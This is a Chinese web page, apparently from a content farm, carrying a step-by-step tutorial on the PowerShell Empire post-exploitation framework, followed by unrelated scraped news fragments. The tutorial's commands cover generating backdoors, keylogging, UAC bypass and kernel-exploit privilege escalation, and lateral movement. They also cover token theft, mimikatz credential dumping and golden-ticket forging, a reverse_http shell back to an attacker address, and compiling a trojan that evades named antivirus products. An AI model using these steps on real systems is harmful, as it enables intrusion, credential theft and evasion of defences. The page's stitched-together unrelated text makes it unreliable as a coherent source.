范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文
国学影视

PowerShellEmpire的后渗透利用

  Empire 后渗透框架主要用于 Windows 内网渗透,该框架主要基于 Powershell 和 Python,它提供了一个模块的架构,帮助攻击者可以创建和执行各种攻击策略,支持包括域内渗透、宏钓鱼、内网横向、权限维持、后门生成等多个模块。
  官网:http://www.powershellempire.com 0x01 下载安装
  安装 Empire 由两种方式,分别是基于源码安装和 apt 包安装 源码安装
  在 Github 中下载 Empire git clone https://github.com/EmpireProject/Empire
  直接安装 Empire 会报错 ./setup/install.sh
  需要安装以下 Python 库,当然在安装库时会遇到很多问题,以下是遇到问题后的解决方法 pip install pyOpenSSL pip install iptools pip install netifaces pip install pydispatch pip install pydispatcher pip install zlib_wrapper pip install macholib pip install xlrd pip install xlutils pip install pyminifier pip install dropbox pip install pefile
  importlib无法安装解决方法 apt-get install build-essential python3-dev python2-dev libssl-dev swig
  M2Crypto无法安装解决方法 pip install ~/Desktop/M2Crypto-0.38.0.tar.gz
  dispatch无法安装解决方法 pip install --upgrade setuptools
  CryPto.Cipher报错解决方法 pip uninstall crypto pip install pycrypto
  下载地址:https://pypi.org/project/M2Crypto/#files
  安装完成后成功启动 Empire
  APT包安装
  使用 apt 包安装 Empire apt install powershell-empire powershell-empire
  0x02 基础使用设置监听器
  进入 Empire 输入help可查看帮助文档
  输入listeners进入监听器设置,按tab自动补全(如果不清楚均可使用该方法)
  设置 http 监听器 uselistener http info #查看监听器信息
  在监听器模块中带有True属性的值必须填写,其他属性可能会存在默认值,使用set和unset可改变设置,首先设置监听器名为test set Name test
  设置监听默认是80端口,但是80端口通常是 Web 服务器,修改端口为8080 set Host http://172.16.54.51:8080 set Port 8080
  开启监听器 execute
  删除监听器 back list kill test
  生成后门
  使用usestager选择后门模块 usestager windows/launcher_bat
  设置监听器和输出目录 set Listener test set OutFile /tmp/lanuncher.bat #默认输出/tmp目录 execute
  在/tmp目录成功找到生成后门
  把输出的后门放入目标系统中执行,执行成功后收到响应 活动代理
  使用agents查看当前会话,通过interact进入会话 agents interact 22FLR8SU
  如果觉得会话名称太过复杂,可重命名会话 rename win7
  agents下可使用命令如下:
  命令执行
  查看系统信息 sysinfo
  查询agents命令 help agentscmds
  执行终端命令 shell whoami
  基本功能
  使用截图功能 sc
  使用键盘记录 usemodule collection/keylogger execute
  使用剪切版 usemodule collection/clipboard_monitor execute
  0x03 常见模块主机扫描
  ARP 扫描模块 sleep 0 #设置间隔时间 usemodule situational_awareness/network/arpscan set Range 192.168.0.1-192.168.0.100 execute
  SMB 扫描模块 usemodule situational_awareness/network/smbscanner set UserName administrator set Password mac  execute
  端口扫描模块 usemodule situational_awareness/network/portscan set Hosts 192.168.0.1-100 set Ports 445 execute
  信息收集
  查找本地管理员主机 usemodule situational_awareness/network/powerview/find_localadmin_access execute
  查看共享文件 usemodule situational_awareness/network/powerview/share_finder execute
  Windows 本地信息收集 usemodule situational_awareness/host/winenum execute
  权限提升
  当前权限并非管理员,需要提权操作
  使用 UAC bypass 模块提权 usemodule privesc/bypassuac set Listener test execute
  使用 powerup 检查可提权项,找到后可利用环境向量提权 usemodule privesc/powerup/allchecks set Listener test execute
  使用计划任务进行提权 usemodule persistence/elevated/schtasks* set Listener test execute
  通过溢出漏洞提权,比如烂土豆漏洞
  usemodule privesc/ms16-032 或 usemodule privesc/ms16-135 set Listener test execute
  成功提权至 SYSTEM agents
  0x04 域内渗透环境介绍DC: 192.168.52.138 T1: 192.168.52.128 192.168.0.100 D1: 192.168.52.141
  当前已取得域内普通用户mac和本地管理员权限 agents
  信息收集
  基础信息收集,包括系统信息、用户信息、网络环境等 sysinfo whoami info
  使用 ARP 扫描,成功找到192.168.52.0/24存在四台主机 usemodule situational_awareness/network/arpscan set Range 192.168.52.0/24 execute
  查找本地管理员 usemodule situation_awareness/network/powerview/find_localadmin_access execute
  查看当前用户是否为其他主机上的本地管理员 shell dir 192.168.52.141C$
  成功找到域控主机IP为192.168.52.138 usemodule situation_awareness/network/powerview/get_domain_controller execute
  横向移动
  使用会话注入需要管理员权限,切换本地管理员后把当前会话注入到其他主机上 usemodule lateral_movement/invoke_psexec set Listener test set ComputerName stu1 execute
  使用invoke_wmi模块相比invoke_psexec更加隐蔽 usemodule lateral_movement/invoke_wmi  set Listener test set ComputerName stu1 execute
  窃取token
  在新会话中查看进程发现域管理员进程 ps
  选择目标 PID 号后窃取域管理员 token steal_token 1740 shell dir OWAC$
  如果需要恢复原来的身份可使用以下命令 revtoself
  凭证获取
  利用 mimikatz 拿到管理员密码明文和哈希 mimikatz
  查看所有用户凭证如下: creds
  利用哈希传递可拿到域控访问权限 黄金票据
  在域控下使用lsadump模块获取域内所有用户哈希 usemodule credentials/mimikatz/lsadump creds
  成功拿到krbtgt用户哈希
  利用golden_ticket制作黄金票据 usemodule credentials/mimikatz/golden_ticket set credid 10 set user administrator execute
  0x05 会话管理会话生成
  使用spawn模块生成新会话 usemodule management/spawn set Listener test execute
  进程注入
  查看进程并选择需注入的进程ID ps
  成功注入winlogon进程 psinject test 1120
  注入这类系统进程不会出现蓝屏 MSF会话联动
  首先在 MSF 中设置 http 监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.0.50 set lport 4444 exploit -j
  在 Empire 中设置反弹,其中 payload 需要与上对应 usemodule code_execution/invoke_shellcode set Lhost 192.168.0.50 set Lport 4444 set Payload reverse_http execute
  经测试未受到反弹shell,查阅资料后发现 Empire 转到 MSF 存在局限性,具体可查看https://www.jianshu.com/p/c5153ee1eb76 0x06 Empire-Web下载安装
  Empire 存在 web 版本,把 PHP 和 Empire 结合的方式通过网页进行访问
  下载地址:https://github.com/interference-security/empire-web/
  下载 empire-web git clone https://github.com/interference-security/empire-web/
  安装 PHP 扩展,需根据本机的 PHP 版本进行修改 apt-get install php7.4-curl
  重启 Apache 后启用扩展 /etc/init.d/apache2 restart 基础使用
  设置绑定端口和登录账号密码 ./empire --rest --restport 1337 --username admin --password 3mpir3admin
  访问站点输入账号密码admin/3mpir3admin
  成功登录能够可视化各个模块
  查看Agents模块
  查看已获取的用户凭证
  查看文件系统
  0x07 免杀模块生成csharp木马
  准备 Visual Stido 用于编译 C# 文件
  下载地址:http://download.microsoft.com/download/B/0/F/B0F589ED-F1B7-478C-849A-02C8395D0995/VS2012_ULT_chs.iso
  生成 C# 类型木马 usestager windows/csharp_exe set Listener test info execute
  成功生成后门文件launcher.src
  csharp编译免杀
  使用 Visual Stdio 打开cmd.sln
  需要安装.net 2.0环境,打开程序与功能中的添加或删除程序安装net 3.5版本,如果无法安装,打开组策略》系统〉指定可选组件安装和组件修复的设置
  .net支持:https://dotnet.microsoft.com/en-us/download/visual-studio-sdks
  修改命名空间为mac123并添加花指令 var a = "12345678"; var b = "67890123";
  完成后编译生成程序文件
  免杀效果
  使用火绒成功免杀
  使用360成功免杀
  但是执行后360会对行为查杀,上线则不受影响
  成功进入新会话当中 interact XWVH8ME2

成都出发3小时,直达川西小瑞士牧场,景美人少免门票秋日生活打卡季成都市作为整个四川省内唯一的一座平原城市,成都人民想要看草原和牧场是相对比较困难的,今天小编就推荐一个距离成都最近的川西小瑞士牧场,即使你不去红原,若尔盖这些地方也能4年9500万美元!湖人选中的4号秀!完成压哨续约北京时间10月18日早上6点,是2019届新秀提前续约截止时间,有两笔压哨签约小凯文波特4年8250万美元提前续约火箭(仅第一年是全额保障)德安德烈亨特4年9500万美元提前续约老一条1880年的旧李维斯牛仔裤近日在拍卖会上以87,000美元高价售出一条在一个多世纪前被磨损和撕裂的李维斯牛仔裤近日在墨西哥拍卖会中以高达87,000美元的价格售出。就是下面这条毫不起眼的牛仔裤裤腿磨损褪色严重,整条裤子布满油漆和污渍,裤腿上甚至有比特币维持在2万美元以下震荡,为何分析师预测熊市即将结束?最近,加密货币行情处于横盘震荡,下行趋势表现较为明显比特币连续10天维持在2万美元以下震荡,最低价格为18155美元,最高价格为19954美元,而最近三天震荡幅度明显收窄,价格位于4大省属有色金属国企在2022年公布的世界500强中,有4家地方国有有色金属企业上榜,分别是江西铜业集团(第176)金川集团(第339)铜陵有色金属集团(第400)紫金矿业集团(第407),这4家分别陈国公主18岁去世,戴黄金面具与舅舅合葬,被发现时两人紧紧相依在1986年,在内蒙通辽青龙山一带,施工队正在为一个水库工程进行紧张的施工,过程里,挖掘机从泥塘中挖出大量青砖,不久之后,一座墓葬的顶部被挖掘出来。将工地的情况上报,有考古人员来对泰国王后一天换两套首饰,单股项链养眼三股项链个性苏提达王后频繁现身,不但服装不重样,而且首饰也是一套衣服搭配一套首饰,奢华与美丽都赶上婆婆诗丽吉王太后了,不过这些首饰应该就是婆婆佩戴过的款式,被她重新搭配后又重新焕发光彩,打扮出金价大跌!2022年10月17日各大金店黄金价格多少钱一克?周一(10月17日),国际金价上涨。不过国内黄金价格今天全线补跌,除了老凤祥和周大生外,其余知名金店黄金价格每克都跌到了500元以下。菜百和中国黄金甚至以跌破490元克。这是今天官黄金首饰卖多少钱一克你知道吗?不了解这几点,你将多花冤枉钱黄金制作的首饰特别的多样,而且黄金制作成首饰的寓意非常多,消费者会非常的青睐和喜爱这些黄金首饰。但是金价通常比较高,很多人都想要等着金价底的时候去购买,免得花大价钱还买亏了。那你知盘点世界上最豪华昂贵的10枚结婚戒指,1枚戒指就能换1栋楼的豪横婚戒是爱与承诺的永恒象征,代表了两个已婚人士之间牢不可破的终身爱和承诺。不论是中式婚礼或是西式婚礼,现场交换婚戒的场景永远都在。现在市面上各式各样的婚戒琳琅满目,作为准新娘有时也会买黄金水有多深?去买黄金水太深?看完这篇文章让你不掉坑里(亲身经历)生日到了我想买黄金项链和手镯,卖黄金珠宝常见的品牌很多(品牌我就不一一列出了)我也是去了几家自称一线品牌的门店看,我第一家去的中
河南工业职业技术学院2022年公开招聘博士研究生工作方案根据河南省事业单位公开招聘工作规程(豫人社201555号)和中共河南省委组织部河南省人力资源和社会保障厅关于进一步加强和改进事业单位公开招聘工作的意见(豫人社事业20164号)规定贵州酒席太奇葩,血拌生猪肉排名第三,红肉排第二,你敢吃吗?说到贵州这个地方,山清水秀,景美人更美,在这里生活着不同的少数民族,大家也纷纷带来了本地的特色美食,去过本地的朋友都知道,一些特殊的美食有的让人口水直流,有的却让人望而却步。要想一年末最值得买的4部手机,三四年不过时,内行人公认的真香机您在阅读前请点击上面的关注二字,后续会第一时间为您提供更多有价值的相关内容,感谢您的支持。最近几年手机的性能有了很大的提升,所以人们不经常更换手机了,如果想要一部手机能够使用三四年宁夏国企改革全面发力近年来,宁夏回族自治区加快推进国有经济布局优化和结构调整,培育绿色发展动能,着力破解改革难题,逐步建立现代企业制度及国资监管体制,让企业轻装上阵。据统计,今年1至11月,宁夏国资部深圳消费版图呈现宝安热度来源读特岁末年初,宝安各大商圈迎来一片消费旺景。壹方城的Super礼享节实力宠粉,欢乐港湾摩天轮是打卡首选,沙井京基百纳广场的金蚝节让大众尽享美食,满纷天地奥特莱斯低至一折的促销力一厂年产布洛芬8000吨,国人却一颗难求?一场疫情,炸出各路妖怪。三年前疫情初期,无数无良商家为了高额利润,企图发国难财,昧着良知,踩着刀尖,践踏法律。如今三年过去了,一样的事情持续发生着,囤积药品,哄抬物价,制造恐慌。财今年楼市销售额或达14万亿出台超千条新政,稳销售提信心2022年6月28日,南宁市,五象新区新建的商品住宅小区楼盘。人民视觉资料图2022年,房地产行业极为不易。业内预计,全国新建商品房成交规模连续5年达到17亿平方米以上之后,202每月1980元!深圳失业补助金领取流程疫情严峻大厂裁员这个冬天带来的不仅仅只是严寒,很多朋友们在暂时失去工作后并不知道该如何度过眼下这一困难时期。今天我们就为大家介绍如何领取失业金补助失业证办理失业后想领取失业金必须要跨界光伏,谁能笑傲江湖?光伏概念已经成为资本市场的香饽饽,仿佛但凡沾上光伏的边,股价便可嗑药般上蹿。可事实真的如此简单么?文NESALON新能荟小编团2021年底,经济学家任泽平在一次演讲中提到在当下,新代表委员风采省政协委员天福体育博物馆馆长谢飞推动全民健身运动广泛深入持久开展省政协委员天福体育博物馆馆长谢飞推动全民健身运动广泛深入持久开展海南日报记者刘操我将履职尽责,积极为海南体育事业发展建言献策。近日,天福体育博物馆馆长海南恩铭体育文化发展有限公司董比亚迪的2022出海忙,新能源汽车足迹遍布70多个国家和地区2022年,中国新能源汽车出海开启了新的篇章。根据中汽协数据,今年前8个月中国汽车累计出口量已经超过德国,仅次于日本,成为世界第二大汽车出口国。截至2022年一季度,中国生产的电动